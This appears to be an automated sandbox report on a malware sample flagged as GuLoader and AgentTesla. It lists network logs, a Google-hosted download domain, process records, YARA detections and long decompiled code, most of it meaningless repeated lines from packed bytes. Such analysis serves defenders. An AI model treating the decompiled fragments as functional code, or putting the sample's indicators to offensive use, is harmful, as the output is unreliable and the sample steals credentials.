                          Feb 22, 2021 20:30:14.993709087 CET53567948.8.8.8192.168.2.4
                          Feb 22, 2021 20:30:16.050041914 CET5653453192.168.2.48.8.8.8
                          Feb 22, 2021 20:30:16.107153893 CET53565348.8.8.8192.168.2.4
                          Feb 22, 2021 20:30:17.195919991 CET5662753192.168.2.48.8.8.8
                          Feb 22, 2021 20:30:17.247493982 CET53566278.8.8.8192.168.2.4
                          Feb 22, 2021 20:30:18.588977098 CET5662153192.168.2.48.8.8.8
                          Feb 22, 2021 20:30:18.637809992 CET53566218.8.8.8192.168.2.4
                          Feb 22, 2021 20:30:21.004780054 CET6311653192.168.2.48.8.8.8
                          Feb 22, 2021 20:30:21.053427935 CET53631168.8.8.8192.168.2.4
                          Feb 22, 2021 20:30:25.945535898 CET6407853192.168.2.48.8.8.8
                          Feb 22, 2021 20:30:26.006371975 CET53640788.8.8.8192.168.2.4
                          Feb 22, 2021 20:30:42.163717031 CET6480153192.168.2.48.8.8.8
                          Feb 22, 2021 20:30:42.212616920 CET53648018.8.8.8192.168.2.4
                          Feb 22, 2021 20:30:56.181653976 CET6172153192.168.2.48.8.8.8
                          Feb 22, 2021 20:30:56.248737097 CET53617218.8.8.8192.168.2.4
                          Feb 22, 2021 20:30:57.030400038 CET5125553192.168.2.48.8.8.8
                          Feb 22, 2021 20:30:57.098644018 CET53512558.8.8.8192.168.2.4
                          Feb 22, 2021 20:30:57.458235979 CET6152253192.168.2.48.8.8.8
                          Feb 22, 2021 20:30:57.528398037 CET53615228.8.8.8192.168.2.4
                          Feb 22, 2021 20:30:57.949670076 CET5233753192.168.2.48.8.8.8
                          Feb 22, 2021 20:30:58.001070976 CET53523378.8.8.8192.168.2.4
                          Feb 22, 2021 20:31:08.427495003 CET5504653192.168.2.48.8.8.8
                          Feb 22, 2021 20:31:08.486000061 CET53550468.8.8.8192.168.2.4
                          Feb 22, 2021 20:31:22.894288063 CET4961253192.168.2.48.8.8.8
                          Feb 22, 2021 20:31:22.942935944 CET53496128.8.8.8192.168.2.4
                          Feb 22, 2021 20:31:23.491307974 CET4928553192.168.2.48.8.8.8
                          Feb 22, 2021 20:31:23.551033020 CET53492858.8.8.8192.168.2.4
                          Feb 22, 2021 20:31:24.125593901 CET5060153192.168.2.48.8.8.8
                          Feb 22, 2021 20:31:24.182749033 CET53506018.8.8.8192.168.2.4
                          Feb 22, 2021 20:31:24.666773081 CET6087553192.168.2.48.8.8.8
                          Feb 22, 2021 20:31:24.715358973 CET53608758.8.8.8192.168.2.4
                          Feb 22, 2021 20:31:24.744188070 CET5644853192.168.2.48.8.8.8
                          Feb 22, 2021 20:31:24.811337948 CET53564488.8.8.8192.168.2.4
                          Feb 22, 2021 20:31:25.207520008 CET5917253192.168.2.48.8.8.8
                          Feb 22, 2021 20:31:25.272049904 CET53591728.8.8.8192.168.2.4
                          Feb 22, 2021 20:31:25.877005100 CET6242053192.168.2.48.8.8.8
                          Feb 22, 2021 20:31:25.934243917 CET53624208.8.8.8192.168.2.4
                          Feb 22, 2021 20:31:26.578605890 CET6057953192.168.2.48.8.8.8
                          Feb 22, 2021 20:31:26.628770113 CET53605798.8.8.8192.168.2.4
                          Feb 22, 2021 20:31:27.448235989 CET5018353192.168.2.48.8.8.8
                          Feb 22, 2021 20:31:27.507504940 CET53501838.8.8.8192.168.2.4
                          Feb 22, 2021 20:31:28.631377935 CET6153153192.168.2.48.8.8.8
                          Feb 22, 2021 20:31:28.692471027 CET53615318.8.8.8192.168.2.4
                          Feb 22, 2021 20:31:29.393434048 CET4922853192.168.2.48.8.8.8
                          Feb 22, 2021 20:31:29.452748060 CET53492288.8.8.8192.168.2.4

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                          Feb 22, 2021 20:30:57.030400038 CET192.168.2.48.8.8.80xe44aStandard query (0)doc-14-9s-docs.googleusercontent.comA (IP address)IN (0x0001)

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                          Feb 22, 2021 20:30:57.098644018 CET8.8.8.8192.168.2.40xe44aNo error (0)doc-14-9s-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                          Feb 22, 2021 20:30:57.098644018 CET8.8.8.8192.168.2.40xe44aNo error (0)googlehosted.l.googleusercontent.com142.250.186.33A (IP address)IN (0x0001)

                          HTTPS Packets

                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                          Feb 22, 2021 20:30:57.210716963 CET142.250.186.33443192.168.2.449746CN=*.googleusercontent.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Tue Jan 26 10:05:02 CET 2021 Thu Jun 15 02:00:42 CEST 2017Tue Apr 20 11:05:01 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                          CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021

                          Code Manipulations

                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Start time:20:29:54
                          Start date:22/02/2021
                          Path:C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exe
                          Wow64 process (32bit):true
                          Commandline:'C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exe'
                          Imagebase:0x400000
                          File size:73728 bytes
                          MD5 hash:9BCA56D197DA87E223E660316B3A48A0
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Visual Basic
                          Reputation:low

                          General

                          Start time:20:30:45
                          Start date:22/02/2021
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          Wow64 process (32bit):true
                          Commandline:'C:\Users\user\Desktop\GUEROLA INDUSTRIES N#U00ba de cuenta.exe'
                          Imagebase:0xdf0000
                          File size:64616 bytes
                          MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000008.00000002.908051944.0000000001201000.00000040.00000001.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.911956982.000000001DCC1000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.911956982.000000001DCC1000.00000004.00000001.sdmp, Author: Joe Security
                          Reputation:high

                          General

                          Start time:20:30:46
                          Start date:22/02/2021
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff724c50000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Disassembly

                          Code Analysis

                          Reset < >

                            Executed Functions

                            C-Code - Quality: 79%
                            			E00401E3C(signed char __eax, intOrPtr* __ebx, intOrPtr* __ecx, intOrPtr* __edx, intOrPtr* __edi, intOrPtr* __esi, void* __eflags, void* __fp0) {
                            				signed char _t53;
                            				signed char _t54;
                            				signed char _t56;
                            				intOrPtr* _t57;
                            				signed char _t58;
                            				signed char _t59;
                            				void* _t60;
                            				void* _t62;
                            				void* _t63;
                            				void* _t64;
                            				void* _t65;
                            				void* _t67;
                            				void* _t69;
                            				intOrPtr _t71;
                            				void* _t74;
                            				void* _t75;
                            				void* _t78;
                            				void* _t79;
                            				intOrPtr* _t80;
                            				void* _t81;
                            				void* _t82;
                            				signed char _t89;
                            				signed int _t90;
                            				signed char _t91;
                            				intOrPtr* _t92;
                            				signed int _t93;
                            				signed char _t95;
                            				signed int _t97;
                            				signed int _t98;
                            				intOrPtr* _t99;
                            				intOrPtr* _t101;
                            				void* _t102;
                            				void* _t103;
                            				void* _t104;
                            				void* _t105;
                            				void* _t106;
                            				void* _t107;
                            				intOrPtr* _t117;
                            				void* _t123;
                            				void* _t125;
                            				void* _t135;
                            				intOrPtr* _t144;
                            				void* _t151;
                            				void* _t157;
                            				void* _t159;
                            				void* _t161;
                            				void* _t163;
                            				void* _t164;
                            				void* _t166;
                            				intOrPtr* _t170;
                            				void* _t171;
                            				void* _t172;
                            				void* _t173;
                            				void* _t174;
                            				signed int _t180;
                            				void* _t183;
                            				signed int _t186;
                            				void* _t192;
                            				void* _t193;
                            				void* _t194;
                            				void* _t197;
                            				intOrPtr _t206;
                            				void* _t208;
                            				intOrPtr _t209;
                            				void* _t227;
                            				void* _t231;
                            
                            				_t170 = __esi;
                            				_t155 = __edi;
                            				_t144 = __edx;
                            				_t117 = __ecx;
                            				_t99 = __ebx;
                            				_t53 = __eax;
                            				_push(_t192);
                            				if(__eflags < 0) {
                            					_push(0x35006369);
                            					if(__eflags < 0) {
                            						 *__eax =  *__eax + __eax;
                            						asm("out 0x19, al");
                            						 *__eax =  *__eax + __eax;
                            						 *__eax =  *__eax + __eax;
                            						_t192 = _t192 + 1;
                            						asm("sbb al, [eax]");
                            						 *((intOrPtr*)(__eax + __eax + 0x46)) =  *((intOrPtr*)(__eax + __eax + 0x46)) + __eax;
                            						_t155 = __edi + __edi;
                            						 *__edx =  *__edx + __ebx;
                            						 *__eax =  *__eax + __eax;
                            						 *0x69540006 =  *0x69540006 + __eax;
                            					}
                            					_t5 = _t117 + 0x6d + _t180 * 2;
                            					 *_t5 =  *((intOrPtr*)(_t117 + 0x6d + _t180 * 2)) + _t144;
                            					if( *_t5 >= 0) {
                            						 *_t99 =  *_t99 + _t117;
                            						_pop(es);
                            						_t97 =  *0x3ff0000 * 0x28;
                            						_push(es);
                            						_push(es);
                            						 *((intOrPtr*)(_t170 + 0x72)) =  *((intOrPtr*)(_t170 + 0x72)) + _t97;
                            						asm("popad");
                            						asm("insd");
                            						 *[gs:eax] =  *[gs:eax] ^ _t97;
                            						_t98 = _t97 +  *_t117;
                            						 *_t98 =  *_t98 | _t98;
                            						_t144 = _t144 + 1;
                            						_t117 = _t117 + 1;
                            						_push(_t144);
                            						_t155 = _t155 - 1;
                            						_t99 = _t99;
                            						_t180 = _t180 + 1;
                            						_push(_t99);
                            						 *0x28505b6 =  *0x28505b6 + _t98;
                            						_t53 = _t98 ^ 0x12015a02;
                            					}
                            					 *_t144 =  *_t144 + _t144;
                            					_t95 = _t53 +  *_t53;
                            					 *_t99 =  *_t99 + 1;
                            					 *_t95 =  *_t95 - _t95;
                            					 *_t95 =  *_t95 + _t95;
                            					_pop(es);
                            					_push(es);
                            					 *((intOrPtr*)(_t170 + 0x72)) =  *((intOrPtr*)(_t170 + 0x72)) + _t95;
                            					asm("popad");
                            					asm("insd");
                            					_t53 = (_t95 ^  *[gs:eax]) +  *_t117;
                            					 *_t53 =  *_t53 | _t53;
                            				}
                            				_t17 = _t53 + 0x6a;
                            				 *_t17 =  *((intOrPtr*)(_t53 + 0x6a)) + _t117;
                            				_t206 =  *_t17;
                            				if(_t206 >= 0) {
                            					L18:
                            					_t193 = _t192 - 1;
                            					asm("popad");
                            					asm("bound esp, [ebp+0x6c]");
                            					_t54 = _t53 ^  *_t53;
                            					 *_t117 =  *_t117 + _t54;
                            					_push(_t99);
                            					_t56 = (_t54 |  *_t54) - 1;
                            					_t171 = _t170 - 1;
                            					_t117 = _t117 + 2 - 1;
                            					_push(_t99);
                            					_t180 = _t180 + 1;
                            					 *0x7c40558 =  *0x7c40558 + _t56;
                            					goto L19;
                            				} else {
                            					asm("gs insd");
                            					asm("insd");
                            					if(_t206 == 0) {
                            						L16:
                            						_t91 = _t53;
                            						goto L17;
                            					} else {
                            						_t93 = _t53 + 0xda0593;
                            						_pop(es);
                            						_t193 = _t192 - 1;
                            						_pop(es);
                            						asm("adc al, [0x2803ff00]");
                            						 *_t93 =  *_t93 + _t93;
                            						 *_t93 =  *_t93 + _t117;
                            						_push(es);
                            						 *((intOrPtr*)(_t170 + 0x72)) =  *((intOrPtr*)(_t170 + 0x72)) + _t93;
                            						asm("popad");
                            						asm("insd");
                            						_t56 = (_t93 ^  *[gs:eax]) +  *_t117;
                            						 *_t56 =  *_t56 | _t56;
                            						_t171 = _t170 - 1;
                            						_t208 = _t171;
                            						asm("outsd");
                            						if(_t208 != 0) {
                            							L20:
                            							asm("adc al, [ecx]");
                            							_t172 = _t171 +  *0x3000000;
                            							 *_t56 =  *_t56 | _t56;
                            							_t101 = _t99 + _t99 + 1;
                            							asm("popad");
                            							if(_t101 < 0) {
                            								goto L25;
                            							} else {
                            								_t186 =  *(_t155 + 0x6e) * 0x1010032;
                            								asm("adc eax, [eax]");
                            								_push(_t193);
                            								_push(_t186);
                            								_push(_t193);
                            								_t58 = _t56 - 1;
                            								_push(_t186);
                            								_push(_t101);
                            								_t101 = _t101 - 1;
                            								_t197 = _t193 + 2;
                            								_t117 = _t117 + 1 - 1 + 1;
                            								_push(_t197);
                            								_push(_t144);
                            								_t172 = _t172;
                            								_t183 = _t186 + 2;
                            								 *0xa500c30 =  *0xa500c30 + _t58;
                            								_t155 = 0x1201ef04;
                            								 *_t58 =  *_t58 + _t58;
                            								goto L22;
                            							}
                            						} else {
                            							asm("insb");
                            							asm("insb");
                            							if (_t208 >= 0) goto L11;
                            							_t58 = _t56 + 0x1a707e9;
                            							asm("loope 0x8");
                            							asm("rol dword [0xff000612], cl");
                            							_t183 = _t180 +  *_t155;
                            							 *_t58 =  *_t58 + _t58;
                            							 *_t117 =  *_t117 + _t58;
                            							_push(es);
                            							 *((intOrPtr*)(_t117 + 0x62)) =  *((intOrPtr*)(_t117 + 0x62)) + _t117;
                            							asm("gs insb");
                            							 *_t58 =  *_t58 ^ _t58;
                            							 *_t117 =  *_t117 + _t58;
                            							_t209 =  *_t117;
                            							asm("str word [ebp+0x75]");
                            							asm("arpl [edi+0x73], bp");
                            							asm("outsd");
                            							if(_t209 < 0) {
                            								L22:
                            								 *_t101 =  *_t101 + 1;
                            								goto L23;
                            							} else {
                            								if(_t209 < 0) {
                            									L23:
                            									 *[cs:eax] =  *[cs:eax] + _t58;
                            									 *((intOrPtr*)(_t58 + _t117)) =  *((intOrPtr*)(_t58 + _t117)) + _t58;
                            									_t28 = _t101 + 0x61;
                            									 *_t28 =  *((intOrPtr*)(_t101 + 0x61)) + _t58;
                            									if( *_t28 >= 0) {
                            										_t89 = _t58;
                            										_push(_t197);
                            										_t180 =  *(_t155 + 0x6e) * 0x1010031 - 1 + 1 - 1 + 1;
                            										_t172 = _t172 + 1 - 1;
                            										_push(_t101);
                            										 *0xa500c30 =  *0xa500c30 + _t89;
                            										_t155 = 0x1201ef04;
                            										_t90 = _t89 +  *_t89;
                            										 *_t101 =  *_t101 + 1;
                            										asm("lodsb");
                            										 *_t90 =  *_t90 + 0x60900;
                            										_t117 = _t117 + 1;
                            										asm("insd");
                            										asm("popad");
                            										 *[gs:bx+si] =  *[gs:bx+si] ^ _t90;
                            										asm("sbb [edx], al");
                            										es =  *((intOrPtr*)(_t117 + 0x746c0000));
                            										 *_t90 =  *_t90 + _t90;
                            										_t32 = _t117 + 0x4d420000;
                            										_t56 =  *_t32;
                            										 *_t32 = _t90;
                            										L25:
                            										 *_t56 =  *_t56 + _t56;
                            										_t144 = _t144 + 1;
                            										_t183 = _t180 - 1;
                            										_t57 =  *_t117;
                            										 *_t117 = _t56;
                            										 *_t57 =  *_t57 + _t57;
                            										 *[ds:eax] =  *[ds:eax] + _t57;
                            										 *_t57 =  *_t57 + _t117;
                            										 *_t57 =  *_t57 + _t57;
                            										 *((intOrPtr*)(_t57 + 0x4f000001)) =  *((intOrPtr*)(_t57 + 0x4f000001)) + _t144;
                            										_t58 = _t57 +  *_t57;
                            										 *_t117 =  *_t117 + _t58;
                            										 *_t117 =  *_t117 + _t58;
                            										 *_t58 =  *_t58 + _t58;
                            										 *_t58 =  *_t58 + _t58;
                            										 *((intOrPtr*)(_t58 - 0x7f)) =  *((intOrPtr*)(_t58 - 0x7f)) + _t117;
                            										 *_t58 =  *_t58 + _t58;
                            										 *_t58 =  *_t58 + _t58;
                            										 *_t58 =  *_t58 + _t58;
                            										 *_t58 =  *_t58 + _t58;
                            										 *_t58 =  *_t58 + _t58;
                            										 *_t58 =  *_t58 + _t58;
                            										 *_t58 =  *_t58 + _t58;
                            										 *_t58 =  *_t58 + _t58;
                            									}
                            								} else {
                            									asm("insb");
                            									asm("gs outsb");
                            									if(_t209 != 0) {
                            										 *0x16f06c4 =  *0x16f06c4 + _t58;
                            										if( *0x16f06c4 > 0) {
                            											asm("out dx, eax");
                            											 *_t144 =  *_t144 + _t144;
                            											goto L16;
                            										}
                            										L17:
                            										 *_t99 =  *_t99 + 1;
                            										_t92 = _t91 -  *_t91;
                            										 *_t92 =  *_t92 + _t92;
                            										_t53 = _t92 +  *_t170;
                            										 *((intOrPtr*)(_t117 + 0x62)) =  *((intOrPtr*)(_t117 + 0x62)) + _t117;
                            										goto L18;
                            									}
                            									L19:
                            									_push(es);
                            									asm("out dx, eax");
                            									 *_t144 =  *_t144 + _t144;
                            									goto L20;
                            								}
                            							}
                            						}
                            					}
                            				}
                            				 *_t58 =  *_t58 + _t58;
                            				_t59 = _t58 ^ 0x00000067;
                            				asm("lahf");
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
                            				 *_t59 =  *_t59 + _t59;
